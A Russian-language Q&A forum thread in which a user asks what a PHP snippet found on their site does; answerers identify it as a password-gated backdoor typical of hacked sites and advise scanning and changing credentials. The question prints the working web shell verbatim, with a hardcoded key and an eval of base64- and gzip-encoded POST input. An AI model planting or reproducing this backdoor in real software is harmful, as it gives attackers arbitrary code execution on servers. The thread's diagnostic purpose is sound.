valeusk
@valeusk
Смело пишу всякую хрень ибо не ведаю, что творю!

Что делает этот код?

<?php  if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="erYj7#ZRu*q1ENPO2sdfsdf5CB6yhLdnUlGxM")eval(gzuncompress(base64_decode($_POST["chk"]))); ?>
  • Вопрос задан
  • 327 просмотров
Решения вопроса 1
yarkov
@yarkov
Помог ответ? Отметь решением.
Если существует переменная q и она равна 1, то написать 200 и выйти. (Если существует переменная key и Если существует переменная chk) и если переменная key равна "erYj7#ZRu*q1ENPO2sdfsdf5CB6yhLdnUlGxM", то разжать, сжатую в base64, переменную chk
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
devg
@devg
I am Yenior software developer
Подобные куски кода обычно появляются в коде взломанных или завирусованных сайтов.
Его суть в том, что он позволяет выполнить произвольный код на сервере. Это искуственно созданная уязвимость
Ответ написан
Комментировать
@VisualIdeas
Вас взломали)
Пройдитесь по сайту https://revisium.com/ai/ этой штукой.
Меняйте все пароли/явки/хостера

А этот код ждет когда ему передадут программу и выполняет её.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
YCLIENTS Москва
от 200 000 до 350 000 ₽
Ведисофт Екатеринбург
от 25 000 ₽
ИТЦ Аусферр Магнитогорск
от 100 000 до 160 000 ₽
24 апр. 2024, в 13:32
300 руб./за проект
24 апр. 2024, в 13:10
400000 руб./за проект